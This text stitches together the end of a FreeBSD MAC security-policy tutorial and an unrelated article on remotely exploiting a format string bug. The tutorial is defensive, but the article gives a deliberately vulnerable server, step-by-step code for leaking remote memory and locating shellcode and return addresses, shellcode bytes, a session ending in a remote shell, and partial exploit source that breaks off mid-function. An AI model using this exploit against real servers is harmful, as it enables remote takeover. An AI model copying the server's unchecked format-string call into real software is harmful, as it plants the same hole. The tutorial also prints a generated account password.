Can't grab 0.0.0.0:1000 with bind : Operation not permitted
^^^ the ip.portrange.reservedhigh limit works
$ nc -l -p 1010
Can't grab 0.0.0.0:1010 with bind : Operation not permitted
^^^ the mac.portacl.port_high limit works too

# sysctl security.mac.portacl.rules=uid:2000:tcp:1000,uid:2000:tcp:1010
^^^ we enforce 2 rules (the first tries to bypass ip.portrange.reservedhigh
and the 2nd tries to bypass mac.portacl.port_high)

$ nc -l -p 1000
Can't grab 0.0.0.0:1000 with bind : Permission denied
^^^ mac.portacl allows port 1000 binding while ip.portrange.reservedhigh doesn't
$ nc -l -p 1010
^^^ works due to our firewall rule

NOTE: A basic security policy would be:
# cat rc.mac_portacl
#!/bin/sh
rules="uid:2000:tcp:79,uid:2000:tcp:80"
# allow uid 2000 to bind to port 79 and 80

sysctl net.inet.ip.portrange.reservedlow=0
sysctl net.inet.ip.portrange.reservedhigh=50
# first 50 ports are accessible only by root
sysctl security.mac.portacl.port_high=1023
# our policy works for 50 -> 1023
sysctl security.mac.portacl.suser_exempt=1
# root doesn't need the policy
sysctl security.mac.portacl.rules=$rules

E. mac_test

Tests the mac framework, finds corrupt labels amongst other things.

# kldload mac_test
# sysctl security.mac.test
security.mac.test.enabled: 1
security.mac.test.slot: 2
security.mac.test.init_count_bpfdesc: 0
security.mac.test.init_count_cred: 1920
security.mac.test.init_count_devfsdirent: 0
security.mac.test.init_count_ifnet: 0
...
(big output)

F. mac_none

No effect.

# kldload mac_none

G. mac_stub

Sample policy that does nothing (man 4 mac_stub)

# kldload mac_stub

3. Advanced policies
====================

These policies need labelling. (man 7 maclabel, man 4 mac)

setfmac, setfsmac - set file system labels
setpmac - set process mac
ifconfig - set network interface label
login.conf - set tty/user label

I. login.conf labelling:

Example for the mac_partition and mac_mls policy:

insecure:\
:copyright=/etc/COPYRIGHT:\
:welcome=/etc/motd:\
:setenv=MAIL=/var/mail/$,BLOCKSIZE=K:\
:path=~/bin /bin /usr/bin /usr/local/bin:\
:manpath=/usr/share/man /usr/local/man:\
:nologin=/var/run/nologin:\
:cputime=1h30m:\
:datasize=8M:\
:vmemoryuse=100M:\
:stacksize=2M:\
:memorylocked=4M:\
:memoryuse=8M:\
:filesize=8M:\
:coredumpsize=8M:\
:openfiles=24:\
:maxproc=32:\
:priority=0:\
:requirehome:\
:passwordtime=90d:\
:umask=002:\
:ignoretime@:\
:label=partition/13,mls/5:

^^^ We create a new label in login.conf named insecure
(don't forget to run cap_mkdb /etc/login.conf after that)

# pw user mod new -L insecure
^^^ we set the user's label to insecure

II. ifconfig labelling:

# ifconfig rl0 maclabel 'biba/high(low-high)'
^^^ set high for incomming packets and all for outgoing

III. setfmac, setfsmac labelling:

Boot to single user to enable multilabelling: (man 8 tunefs)

# tunefs -l enable /; tunefs -l enable /home

Exit single user and test:

# ls -lZa test
-rw-r--r-- 1 root new mls/low 0 Apr 6 16:01 test
# setfmac mls/equal test
# getfmac test
test: mls/equal
# tail -n 1 mls-policy.txt
/home/new/test mls/high
# setfsmac -f mls-policy.txt test
setfsmac: mls-policy.txt: read 23 specifications
# getfmac test
test: mls/high

We are set:

$ pw user show new | awk -F\: '{ print $5 }'
insecure
^^^ user new's label is insecure
$ id -P
new:*:2000:2000:insecure:0:0:User &:/home/new:/bin/sh

A. mac_partition

# kldload mac_partition
# top

$ id -u
2000
$ ps -Za|grep top
^^^ we can't see top as the insecure user

# killall -9 top

# setpmac partition/13 top
^^^ we label top to our label

$ ps -Z
LABEL PID TT STAT TIME COMMAND
partition/13 4701 v1 SL 0:00.07 -su (sh)
partition/13 4783 v1 RL+ 0:00.00 ps -Z
$ ps -ZU root
partition/13 976 p3 S+ 0:00.02 top
^^^ we can see top now (even if owned by root)

You can disable all services from /etc/rc.conf and make a script to launch them
manually with proper labelling. (Why should an insecure user see cron running?)
Or even mess with the login scripts:

# setpmac partition/50 bash
# id -u
0
# pw user show root
root:*:0:0::0:0:Charlie &:/root:/usr/local/bin/bash
# ps Zax
LABEL PID TT STAT TIME COMMAND
partition/50 1136 p3 S 0:00.06 bash
partition/50 1169 p3 R+ 0:00.00 ps Zax
^^^ even root can only see his own partition processes

B. mac_mls

mac_mls prevents the downward flow of information

Set default's label to "mls/equal(equal-equal)" and insecure's label to "mls/5(5-5)"
in /etc/login.conf (Do: cap_mkdb /etc/login.conf). Add "mac_mls_load="YES"" to
/boot/loader.conf. Reboot.

$ id -u
2000
$ getpmac
mls/5(5-5)
$ ls -lZ /dev/kmem
ls: /dev/kmem: Permission denied
^^^ filesystem protection is in place

# echo s > test1; echo e > test2; echo x > test3
# getfmac test2
test: mls/equal
# setfmac mls/1 test1; setfmac mls/10 test3
# chown new:new test?

Observation test:

$ ls test?
ls: test3: Permission denied
test1 test2
^^^ we can't observe higher clearance level

Read test:

$ cat test?
s
e
cat: test3: Permission denied
^^^ higher clearance level dissallows read

Write test:

$ echo 1 > test1
cannot create test1: Permission denied
$ echo 1 > test2
$ echo 1 > test3

$ cat test?
1
e
cat: test3: Permission denied
# cat test3
1
^^^ we can write to equal or higher, but not lower

NOTE: lower clearance can't observe higher clearance processes
A basic policy would be to enforce mls/high on everything not to be
read (even if it needs to be written) mls/low on everything not to be
written (even if it needs to be read) and mls/equal on the rest. Any
insecure users should be labelled mls/low.

C. mac_biba

mac_biba prevents the upward flow of information

For this, the default label in /etc/login.conf will be "biba/equal(equal-equal)",
insecure's label will be "biba/5". Run "cap_mkdb /etc/login.conf" also add
mac_biba_load="YES" to loader.conf. Reboot.

$ id -u
2000
$ getpmac
biba/5(5-5)
$ ls -lZ /dev/kmem
crw-r----- 1 root kmem biba/high 2, 1 Apr 7 08:23 /dev/kmem
^^^ filesystem protection is in place

Let the tests begin:

# echo s > test1; echo e > test2; echo x > test3; echo o > test4; echo r > test5
# getfmac test2
test2: biba/high
# setfmac biba/2 test1; setfmac biba/4 test2; setfmac biba/5 test3; setfmac biba/6 test4; setfmac biba/9 test5
# chown new:new test?

Observation test:

$ ls test?; echo; cat test?
ls: test1: Permission denied
ls: test2: Permission denied
test3 test4 test5

cat: test1: Permission denied
cat: test2: Permission denied
x
o
r
^^^ a higher integrity subject can't observe or read a lower integrity object

Write test:

$ echo 1 > test1
$ echo 1 > test2
$ echo 1 > test3
$ echo 1 > test4
cannot create test4: Permission denied
$ echo 1 > test5
cannot create test5: Permission denied
$ cat test?
cat: test1: Permission denied
cat: test2: Permission denied
1
o
r
^^^ a lower integrity subject can't write to a higher integrity subject

D. mac_lomac (man 4 mac_lomac)

While mac_biba denies access to lower integrity objects, mac_lomac
permits access to them, but downgrades the integrity level thus not
violating the integrity rules. (yes I've taken this from the man page)

See section 5. (Notes) part IV. for details about why I didn't explain this policy.

4. Full example
===============

I. Preparation:

We will use the following policies to build a secure environment on a FreeBSD 5.2.1 workstation:

mac_seeotheruids, mac_partition, mac_mls, mac_biba

We boot in single user mode and "tunefs -l enable" all partitions.

We add the following modules to loader.conf and then reboot:

# tail -n 6 /boot/loader.conf
mac_biba_load="YES"
mac_mls_load="YES"
mac_seeotheruids_load="YES"
mac_partition_load="YES"

# kldstat | grep mac
4 1 0xc070d000 7cdc mac_biba.ko
5 1 0xc0715000 7e5c mac_mls.ko
9 1 0xc21e0000 2000 mac_seeotheruids.ko
12 1 0xc21e9000 2000 mac_partition.ko
^^^ Modules are loaded

We edit /etc/login.conf and add the following lines:

# tail -n 25 /etc/login.conf

insecure:\
:copyright=/etc/COPYRIGHT:\
:welcome=/etc/motd:\
:setenv=MAIL=/var/mail/$,BLOCKSIZE=K:\
:path=~/bin /bin /usr/bin /usr/local/bin:\
:manpath=/usr/share/man /usr/local/man:\
:nologin=/var/run/nologin:\
:cputime=1h30m:\
:datasize=8M:\
:vmemoryuse=100M:\
:stacksize=2M:\
:memorylocked=4M:\
:memoryuse=8M:\
:filesize=8M:\
:coredumpsize=8M:\
:openfiles=24:\
:maxproc=32:\
:priority=0:\
:requirehome:\
:passwordtime=90d:\
:umask=002:\
:ignoretime@:\
:label=mls/15(15-15),biba/15(15-15),partition/15:

We also label the default class in order not to interfere with us:

# cat /etc/login.conf|grep -A 25 "default:\\\\" | grep label
:label=mls/equal,biba/equal,partition/equal:

# cap_mkdb /etc/login.conf

# adduser
Username: new
Full name: test user
Uid (Leave empty for default): 2000
Login group [new]:
Login group is new. Invite new into other groups? []:
Login class [default]: insecure
Shell (sh csh tcsh bash nologin) [sh]: bash
Home directory [/home/new]:
Use password-based authentication? [yes]:
Use an empty password? (yes/no) [no]:
Use a random password? (yes/no) [no]: yes
Lock out the account after creation? [no]:
Username : new
Password :
Full Name : test user
Uid : 2000
Class : insecure
Groups : new
Home : /home/new
Shell : /bin/bash
Locked : no
OK? (yes/no): yes
adduser: INFO: Successfully added (new) to the user database.
adduser: INFO: Password for (new) is: VOdCyK11E2p
Add another user? (yes/no): no
Goodbye!

# su -s - new
$ id -u
2000
^^^ from now "$" is the new user and "#" is root
$ pw user show new
new:*:2000:2000:insecure:0:0:test user:/home/new:/bin/bash

II. Implementation and tests:

$ getpmac
biba/15(15-15),mls/15(15-15),partition/15

# setpmac partition/15,mls/equal top
Note: the top process will be killed before we start another top process.

A. mac_seeotheruids test

$ ps Zax
biba/15(15-15),mls/15(15-15),partition/15 1096 #C: S 0:00.03 -su (bash)
biba/15(15-15),mls/15(15-15),partition/15 1101 #C: R+ 0:00.01 ps Zax
^^^ we can't see processes except our own

B. mac_partition test

# sysctl sysctl security.mac.seeotheruids.enabled=0
^^^ it will remain off for the rest of the example

$ ps Zax
LABEL PID TT STAT TIME COMMAND
biba/equal(low-high),mls/equal(low-high),partition/15 1122 #C: S+ 0:00.02 top
biba/15(15-15),mls/15(15-15),partition/15 1096 #C: S 0:00.05 -su (bash)
biba/15(15-15),mls/15(15-15),partition/15 1123 #C: R+ 0:00.01 ps Zax
^^^ we can now see all processes in our partition (15)

C. mac_biba and mac_mls test

# setpmac partition/15,mls/equal,biba/high$high-high$ top

$ ps Zax
LABEL PID TT STAT TIME COMMAND
biba/high(high-high),mls/equal(low-high),partition/15 1251 #C: S+ 0:00.02 top
biba/15(15-15),mls/15(15-15),partition/15 1096 #C: S 0:00.06 -su (bash)
biba/15(15-15),mls/15(15-15),partition/15 1157 #C: R+ 0:00.00 ps Zax
^^^ biba allows us to read higher labelled objects

# setpmac partition/15,mls/equal,biba/low top

$ ps Zax
LABEL PID TT STAT TIME COMMAND
biba/15(15-15),mls/15(15-15),partition/15 1096 #C: S 0:00.07 -su (bash)
biba/15(15-15),mls/15(15-15),partition/15 1226 #C: R+ 0:00.01 ps Zax
^^^ biba doesn't allow lower labelled objects to be read (mls does!)

$ ifconfig rl0 | grep maclabel
maclabel biba/low(low-low),mls/low(low-low)
$ ping -c 1 66.218.71.114
PING 66.218.71.114 (66.218.71.114): 56 data bytes
ping: sendto: Permission denied
^^^ everyone pings yahoo.com
You can set the default interface label to an insecure one (for testing purposes)
Add security.mac.biba.trust_all_interfaces=1 to sysctl.conf
This is caused due to the default policy label in the biba policy. Taken from:
(http://lists.freebsd.org/pipermail/freebsd-security/2003-September/000923.html)

# ifconfig rl0 maclabel biba/equal$low-high$,mls/equal$low-high$
$ ping -c 1 66.218.71.114
PING 66.218.71.114 (66.218.71.114): 56 data bytes
64 bytes from 66.218.71.114: icmp_seq=0 ttl=50 time=204.455 ms

--- 66.218.71.114 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max/stddev = 204.455/204.455/204.455/0.000 ms
^^^ pinging works now

# touch test1 test2 test3 test4 test5
# getfmac test1
test1: biba/equal,mls/equal
# setfmac biba/low test1 test2; setfmac biba/high test4 test5; setfmac mls/low test1 test3; setfmac mls/high test2 test4
^^^ can you keep up? :)
# setfmac mls/equal,biba/equal test3
# getfmac test?
test1: biba/low,mls/low
test2: biba/low,mls/high
test3: biba/equal,mls/equal
test4: biba/high,mls/high
test5: biba/high,mls/equal
# chown new:new test?
^^^ owned by our user

Observation/read test:

$ ls
test1 test2 test3 test4 test5
$ ls test?
ls: test1: Permission denied
ls: test2: Permission denied
ls: test4: Permission denied
test3 test5
^^^ we can't observe pairs (biba/low,mls/low) (biba/low,mls/high) and (biba/high,mls/high)
(and of course, we can't read them)

Writting test:

$ for i in `echo test*`; do echo 1 > $i; done
-su: test1: Permission denied
-su: test4: Permission denied
-su: test5: Permission denied
^^^ we can write to pairs (biba/low,mls/high) and (biba/equal,mls/equal)
$ cat test?
cat: test1: Permission denied
cat: test2: Permission denied
1
cat: test4: Permission denied
# cat test2
1
^^^ yep, worked

III. Conclusion:
A good security system will have good biba/lomac/mls policies, see
http://www.watson.org/~robert/freebsd/lomac-policy.contexts for an example.
Download file, edit it to suid your needs and then run:

# setfsmac -ef lomac-policy.contexts /

5. Notes
========

I. I had problem when unloading module mac_partition after playing with labelling:

module_register_init: MOD_LOAD (mac_partition, 0xc04c3480, 0xc2114e20) error 12

^^^ after this I can't load the module anymore.

II. Running startx as with as mls/equal(equal-equal) (biba/equal, lomac/equal) allows us to su
into a lowclass/highclass user: (run from xterm)

# getpmac
mls/equal(equal-equal)
# su - new
$ getpmac
mls/equal(equal-equal)
# su -s - new
$ getpmac
mls/low(low-low)

III. If subjects can read an object, they can also execute it.
# echo ls > test1; echo ls > test2; echo ls > test3; echo ls > test4; echo ls > test5
# setfmac biba/2 test1; setfmac biba/4 test2; setfmac biba/5 test3; setfmac biba/6 test4; setfmac biba/9 test5
# chmod +x test?

$ getpmac
biba/5(equal-equal)
$ ./test1
./test1: Permission denied
$ ./test2
./test2: Permission denied
$ ./test3
test1 test2 test3 test4 test5
$ ./test4
test1 test2 test3 test4 test5
$ ./test5
test1 test2 test3 test4 test5

IV. mac_lomac
I wasn't able to load this policy, so I couldn't test it.
In login.conf I've set: "lomac/equal" to default class and
"lomac/15" to insecure class. In messages I get:

Apr 7 09:47:12 illusion kernel: Preloaded elf module "/boot/kernel/mac_lomac.ko" at 0xc077a4bc.
Apr 7 09:47:12 illusion kernel: Security policy loaded: TrustedBSD MAC/LOMAC (mac_lomac)

The module is loaded:

# kldstat | grep mac_lomac
6 1 0xc071d000 951c mac_lomac.ko

Files don't have default labelling:

# getfmac /dev/kmem
/dev/kmem: mls/high

And I can't label files:

# setfmac lomac/equal test2; getfmac test2
test2: mls/equal

6. Links of the day
===================

TrustedBSD: http://www.trustedbsd.org
FreeBSD security: http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/security.html

7. Last words
=============

This tutorial is in alpha state so please send me comments to bugghy@rootshell.be

THE USUAL DISCLAIMER:
- ---------------------
This file is for [of course] informational purposes only. I
don't take responsibility for anything anyone does after reading this file.

DOCUMENTATION
=============

man pages
http://www.freebsd.org (FBSD site)
trial and error
own experience
my own mind (yeah ... sure)

- -----------------------------------------------------------

How to remotely and automatically exploit a format bug

2008-12-20T04:00:00.000+07:00

Exploiting a format bug remotely can be something very funny. It
allows to very well understand the risks associated to this kind of
bugs. We won't explain here the basis for this vulnerability (i.e. its
origin or the building of the format string) since there are already
lots of articles available (see the bibliography at the end).

--[ 1. Context : the vulnerable server ]--

We will use very minimalist server (but nevertheless pedagogic) along
this paper. It requests a login and password, then it echoes its
inputs. Its code is available in appendix 1.

To install the fmtd server, you'll have to configure inetd so that
connections to port 12345 are allowed:

# /etc/inetd.conf
12345 stream tcp nowait raynal /home/raynal/MISC/2-MISC/RemoteFMT/fmtd

Or with xinetd:

# /etc/xinetd.conf

service fmtd
{
type = UNLISTED
user = raynal
group = users
socket_type = stream
protocol = tcp
wait = no
server = /tmp/fmtd
port = 12345
only_from = 192.168.1.1 192.168.1.2 127.0.0.1
}

Then restart your server. Don't forget to change the rules of your
firewall if you are using one.

Now, let's see how this server is working:

$ telnet bosley 12345
Trying 192.168.1.2...
Connected to bosley.
Escape character is '^]'.
login: raynal
password: secret
hello world
hello world
^]

telnet> quit
Connection closed.

Let's have a look at the log file:

Jan 4 10:49:09 bosley fmtd[877]: login -> read login [raynal^M ] (8) bytes
Jan 4 10:49:14 bosley fmtd[877]: passwd -> read passwd [bffff9d0] (8) bytes
Jan 4 10:49:56 bosley fmtd[877]: vul() -> error while reading input buf [] (0)
Jan 4 10:49:56 bosley inetd[407]: pid 877: exit status 255

During the previous example, we simply enter a login, a password and a
sentence before closing the connexion. But what happens when we feed
the server with format instructions:

telnet bosley 12345
Trying 192.168.1.2...
Connected to bosley.
Escape character is '^]'.
login: raynal
password: secret
%x %x %x %x
d 25207825 78252078 d782520

The instructions "%x %x %x %x" being executed, it shows that our
server is vulnerable to a format bug.

In fact, all programs acting like that are not vulnerable to a
format bug:

int main( int argc, char ** argv )
{
char buf[8];
sprintf( buf, argv[1] );
}

Using %hn to exploit this leads to an overflow: the formatted
string is getting greater and greater, but since no control is
performed on its length, an overflow occurs.

Looking at the sources reveals that the troubles come from vul()
function:

...
snprintf(tmp, sizeof(tmp)-1, buf);
...

since the buffer is directly available to a malicious user, the
latter is allowed to take control of the server ... and thus gain a
shell with the privileges of the server.

--[ 2. Requested parameters ]--

The same parameters as a local format bug are requested here:

* the offset to reach the beginning of the buffer ;
* the address of a shellcode placed somewhere is the server's memory ;
* the address of the vulnerable buffer ;
* a return address.

The exploit is provided as example in annexe 2. The following parts of
this article explain how it was designed.

Here are some variables used in the exploit:

* sd : the socket between client (exploit) and the vulnerable server ;
* buf : a buffer to read/write some data ;
* read_at : an address in the server's stack ;
* fmt : format string sent to the server.

--[ 2.1 Guessing the offset ]--

This parameter is always necessary for the exploitation of this kind of
bug, and its determination works in the same way as with a local
exploitation:

telnet bosley 12345
Trying 192.168.1.2...
Connected to bosley.
Escape character is '^]'.
login: raynal
password: secret
AAAA%1$x
AAAAa
AAAA%2$x
AAAA41414141

Here, the offset is 2. It is very easy to guess it automatically, and
that is what the function get_offset() aims at. It sends the string
"AAAA%$x" to the server. If the offset is , then the server
answers with the string "AAAA41414141" :

#define MAXOFFSET 255

for (i = 1; i
snprintf(fmt, sizeof(fmt), "AAAA%%%d$x", i);
write(sock, fmt, strlen(fmt));
memset(buf, 0, sizeof(buf));
sleep(1);
read(sock, buf, sizeof(buf))
if (!strcmp(buf, "AAAA41414141"))
offset = i;
}

--[ 2.2 Guessing the address of the shellcode in the stack ]--

If one has to place a shellcode in the memory of the server, it then
has to guess its address. It can be placed in the vulnerable buffer,
or in any other place: we don't care due to format bug :) For
instance, some ftp servers allowed to store it in the password (PASS),
without not too many checks for anonymous or ftp account. Here, our
server works that way.

-- --[ Making a format bug a debugger ]-- --

We aim at finding the address of the shellcode placed in the memory of
the server. So, we will transform the remote server in remote debugger !

Using the format string "%s", one is allowed to read until the buffer
is full or a NULL character is met. So, by sending successively "%s"
to the server, the exploit is able to dump locally the memory of the
remote process:

%$s

In the exploit, it is performed in 2 steps:

1. The function get_addr_as_char(u_int addr, char *buf) converts
addr into char :
*(u_int*)buf = addr;

2. then, the next 4 bytes contains the format instruction.

The format string is then sent to the remote server:

get_addr_as_char(read_at, fmt);
snprintf(fmt+4, sizeof(fmt)-4, "%%%d$s", offset);
write(sd, fmt, strlen(fmt));

The client reads a string at . If it contains no shellcode, the
next reading is performed at this same address, to which one adds the
amount of read bytes (i.e. the return value of read()).

However, all the read characters should not be considered. The
vulnerable instruction on the server is something like:

sprintf(out, in);

To build the out buffer, sprintf() starts by parsing the
string. The first four bytes are the address we intend to read at: they
are simply copied to the output buffer. Then, a format instruction is
met and interpreted. Hence, we have to remove these 4 bytes:

while( (len = read(sd, buf, sizeof(buf))) > 0) {
[ ... ]
read_at += (len-4+1);
[ ... ]
}

-- --[ What to look for ? ]-- --

Another problem is how to identify the shellcode in memory. If one
just looks for all its bytes in the remote memory, there is a risk to
miss it. Since the buffer is ended by a NULL byte, the string placed
just before can contain lots of NOPs. Hence the reading of the
shellcode can be split among 2 readings.

To avoid this, if the amount of read characters is equal to the size
of the buffer, the exploit "forgets" the last sizeof(shellcode) bytes
read from the server. Thus, the next reading is performed at:

while( (len = read(sd, buf, sizeof(buf))) > 0) {
[ ... ]
read_at += len;
if (len == sizeof(buf))
read_at-=strlen(shellcode);
[ ... ]
}

This case has never been tested ... so I don't guarantee it works ;-/

-- --[ Guessing the exact address of the shellcode ]-- --

Pattern matching in a string is performed by the function:

ptr = strstr(buf, pattern);

It returns a pointer to the parsed string addressing the first byte of
the searched pattern. Thus, the position of the shellcode is:

addr_shellcode = read_at + (ptr-buf);

Except that the buffer contains bytes we need to ignore !!! As we have
previously noticed while exploring the stack, the first four bytes of
the output buffer are in fact the address we just read at:

addr_shellcode = read_at + (ptr-buf) - 4;

-- --[ shellcode : a summary ]-- --

Sometimes, some code is worthier than long explanations:

while( (len = read(sd, buf, sizeof(buf))) > 0) {
if ((ptr = strstr(buf, shellcode))) {
addr_shellcode = read_at + (ptr-buf) - 4;
break;
}
read_at += (len-4+1);
if (len == sizeof(buf)) {
read_at-=strlen(shellcode);
}
memset (buf, 0x0, sizeof (buf));
get_addr_as_char(read_at, fmt);
write(sd, fmt, strlen(fmt));
}

--[ 2.3 Guessing the return address ]--

The last (but not the least) parameter to determine is the return
address. We need to find a valid return address in the remote process
stack to overwrite it with the one of the shellcode.

We won't explain here how the functions are called in C, but simply
remind how variables and parameters are placed in the stack. Firstly
the arguments are placed in the stack from the last one (upper) to the
first one (most down). Then, instructions registers (%eip) is saved on
the stack, followed by the base pointer register (%ebp) which
indicates the beginning of the memory for the current function. After
this address, the memory is used for the local variables. When the
function ends, %eip is popped and clean up is made on the stack. This
just means that the registers %esp and %ebp are popped according to
the calling function. The stack is not cleaned up in any way.

So, our goal is to find a place where the register %eip is saved. Two
steps are used:

1. find the address of the input buffer
2. find the return address of the function the vulnerable buffer
belongs to.

Why do we need to look for the address of the buffer ? All pairs
(saved ebp, saved eip) that we could find in the stack are not good
for our purpose. The stack is never really cleaned up between
different calls. So it contains values used for previous calls, even
if they won't really be used by the process.

Thus, by firstly guessing the address of the vulnerable buffer, we
have a point above which all pairs (saved ebp, saved eip) are valid
since the vulnerable buffer is itself on the top of the stack :)

-- --[ Guessing the address of the buffer ]-- --

The input buffer is easily identified in the remote memory: it is a
mirror for the characters we feed it with. The server fmtd copies them
without any modification (Warning: if some characters were placed by
the server before its answer, they should be considered).

So, we simply have to look at the exact copy of our format string in
the server's memory:

while((len = read(sd, buf, sizeof(buf))) > 0) {
if ((ptr = strstr(buf, fmt))) {
addr_buffer = read_at + (ptr-buf) - 4;
break;
}
read_at += (len-4+1);
memset (buf, 0x0, sizeof (buf));
get_addr_as_char(read_at, fmt);
write(sd, fmt, strlen(fmt));
}

-- --[ Guessing the return address ]-- --

On most of the Linux distributions, the top of the stack is at
0xc0000000. This is not true for all the distributions: Caldera put it
at 0x80000000 (BTW, if someone can explain me why ?). The space
reserved in it depends on the needs of the program (mainly local
variables). These are usually placed in the range 0xbfffXXXX, where
is an undefined byte. On the contrary, the instruction of the process
(.text section) are loaded from 0x08048000.

So, we have to read the remote stack to find something that looks
like:

Top of the stack
0x0804XXXX
0xbfffXXXX

Due to little endian, this is equivalent to looking for the string
0xff 0xbf XX XX 0x04 0x08. As we have seen, we don't have to consider
the first 4 bytes of the returned string:

i = 4;
while (i if (buf[i] == (char)0xff && buf[i+1] == (char)0xbf &&
buf[i+4] == (char)0x04 && buf[i+5] == (char)0x08) {
addr_ret = read_at + i - 2 + 4 - 4;
fprintf (stderr, "[ret addr is: 0x%x (%d) ]\n", addr_ret, len);
}
i++;
}
if (addr_ret != -1) break;

The variable is initialized with a very complex formula:

* addr_ret : the address we just read ;
* +i : the offset in the string we are looking for the pattern (we
can't use strstr() since our pattern has wildcards - undefined
bytes XX) ;
* -2 : the first bytes we discover in the stack are ff bf, but
he full word (i.e. saved %ebp) is written on 4 bytes. The -2
is for the 2 "least bytes" placed at the beginning of the word XX
XX ff bf ;
* +4 : this modification is due to the return address which is 4
bytes above the saved %ebp ;
* -4 : as you should be used to now, the first 4 bytes which are a
copy of the read address.

--[ 3. Exploitation ]--

So, since we now have all the requested parameters, the exploitation
in itself is not very difficult. We just have to replace the return
address of the vulnerable function (addr_ret) with the one of the
shellcode (addr_shellcode). The function fmtbuilder is taken from [5]
and build the format string sent to the server:

build_hn(buf, addr_ret, addr_shellcode, offset, 0);
write(sd, buf, strlen(buf));

Once the replacement is performed in the remote stack, we just have to
return from the vul() function. We then send the "quit" command
specially intended to that ;-)

strcpy(buf, "quit");
write(sd, buf, strlen(buf));

Lastly, the function interact() plays with the file descriptors to
allow us to use the gained shell.

In the next example, the exploit is started from bosley to charly :

$ ./expl-fmtd -i 192.168.1.1 -a 0xbfffed01
Using IP 192.168.1.1
Connected to 192.168.1.1
login sent [toto] (4)
passwd (shellcode) sent (10)
[Found offset = 6]
[buffer addr is: 0xbfffede0 (12) ]
buf = (12)
e0 ed ff bf e0 ed ff bf 25 36 24 73

[shell addr is: 0xbffff5f0 (60) ]
buf = (60)
e5 f5 ff bf 8b 04 08 28 fa ff bf 22 89 04 08 eb 1f 5e 89 76 08
31 c0 88 46 07 89 46 0c b0 0b 89 f3 8d 4e 08 8d 56 0c cd 80
31 db 89 d8 40 cd 80 e8 dc ff ff ff 2f 62 69 6e 2f 73 68
[ret addr is: 0xbffff5ec (60) ]
Building format string ...
Sending the quit ...
bye bye ...
Linux charly 2.4.17 #1 Mon Dec 31 09:40:49 CET 2001 i686 unknown
uid=500(raynal) gid=100(users)
exit
$

--[ 4. Conclusion ]--

Less format bugs are discovered ... fortunately. As we just saw, the
automation is not very difficult. The library fmtbuilmder (see the
bibliography) also provides the necessary tools for that.

Here, the exploit starts its reading of the remote memory to an
arbitrary value. But if it is too low, the server crashes. The exploit
can be modified to explore the stack from the top to the bottom... but
the strategies used to identify some values have then to be slightly
adapted. The difficulty seems a bit greater.

The reading then starts from the top of the stack 0xc0000000-4. One
have to change the value of the variable addr_stack. Moreover, the
line read_at+=(len-4+1); have to be replaced with read_at-=4; In this
way, the argument -a is useless.

The disadvantage of this solution is that the return address is below
the input buffer. But all that is below this buffer comes from
function that are no more in the stack: these data are written in a
free region of the stack, so they can be modified at any time by the
process. So, the search of the return address has to be change
(several can be found above the vulnerable buffer ... but we can't
control whether they will be really used).

--[ Greetings ]--

Denis Ducamp and Renaud Deraison for their comments/fixes.

------------------------------------------------------------------------

--[ Appendix 1 : the server side fmtd ]--

#include
#include
#include
#include
#include
#include

void respond(char *fmt,...);

int vul(void)
{
char tmp[1024];
char buf[1024];
int len = 0;

syslog(LOG_ERR, "vul() -> tmp = 0x%x buf = 0x%x\n", tmp, buf);

while(1) {

memset(buf, 0, sizeof(buf));
memset(tmp, 0, sizeof(tmp));
if ( (len = read(0, buf, sizeof(buf))) <= 0 ) {
syslog(LOG_ERR, "vul() -> error while reading input buf [%s] (%d)",
buf, len);
exit(-1);
} /*
else
syslog(LOG_INFO, "vul() -> read %d bytes", len);
*/
if (!strncmp(buf, "quit", 4)) {
respond("bye bye ...\n");
return 0;
}
snprintf(tmp, sizeof(tmp)-1, buf);
respond("%s", tmp);

}
}

void respond(char *fmt,...)
{
va_list va;
char buf[1024];
int len = 0;

va_start(va,fmt);
vsnprintf(buf,sizeof(buf),fmt,va);
va_end(va);
len = write(STDOUT_FILENO,buf,strlen(buf));
/* syslog(LOG_INFO, "respond() -> write %d bytes", len); */
}

int main()
{
struct sockaddr_in sin;
int i,len = sizeof(struct sockaddr_in);
char login[16];
char passwd[1024];
openlog("fmtd", LOG_NDELAY | LOG_PID, LOG_LOCAL0);

/* get login */
memset(login, 0, sizeof(login));
respond("login: ");
if ( (len = read(0, login, sizeof(login))) <= 0 ) {
syslog(LOG_ERR, "login -> error while reading login [%s] (%d)",
login, len);
exit(-1);
} else
syslog(LOG_INFO, "login -> read login [%s] (%d) bytes", login, len);

/* get passwd */
memset(passwd, 0, sizeof(passwd));
respond("password: ");
if ( (len = read(0, passwd, sizeof(passwd))) <= 0 ) {
syslog(LOG_ERR, "passwd -> error while reading passwd [%s] (%d)",
passwd, len);
exit(-1);
} else
syslog(LOG_INFO, "passwd -> read passwd [%x] (%d) bytes", passwd, len);

/* let's run ... */
vul();
return 0;
}

------------------------------------------------------------------------

--[ Appendix 2 : the exploit side expl-fmtd ]--

#include
#include
#include
#include
#include
#include
#include
#include
#include

char verbose = 0, debug = 0;

#define OCT( b0, b1, b2, b3, addr, str ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> 8) & 0xff; \
b3 = (addr ) & 0xff; \
if ( b0 * b1 * b2 * b3 == 0 ) { \
printf( "\n%s contains a NUL byte. Leaving...\n", str ); \
exit( EXIT_FAILURE ); \
} \
}
#define MAX_FMT_LENGTH 128
#define ADD 0x100
#define FOUR sizeof( size_t ) * 4
#define TWO sizeof( size_t ) * 2
#define BANNER "uname -a ; id"
#define MAX_OFFSET 255

int interact(int sock)
{
fd_set fds;
ssize_t ssize;
char buffer[1024];

write(sock, BANNER"\n", sizeof(BANNER));
while (1) {
FD_ZERO(&fds);
FD_SET(STDIN_FILENO, &fds);
FD_SET(sock, &fds);
select(sock + 1, &fds, NULL, NULL, NULL);

if (FD_ISSET(STDIN_FILENO, &fds)) {
ssize = read(STDIN_FILENO, buffer, sizeof(buffer));
if (ssize < 0) {
return(-1);
}
if (ssize == 0) {
return(0);
}
write(sock, buffer, ssize);
}

if (FD_ISSET(sock, &fds)) {
ssize = read(sock, buffer, sizeof(buffer));
if (ssize < 0) {
return(-1);
}
if (ssize == 0) {
return(0);
}
write(STDOUT_FILENO, buffer, ssize);
}
}
return(-1);
}

u_long resolve(char *host)
{
struct hostent *he;
u_long ret;

if(!(he = gethostbyname(host)))
{
herror("gethostbyname()");
exit(-1);
}

memcpy(&ret, he->h_addr, sizeof(he->h_addr));
return ret;
}
int
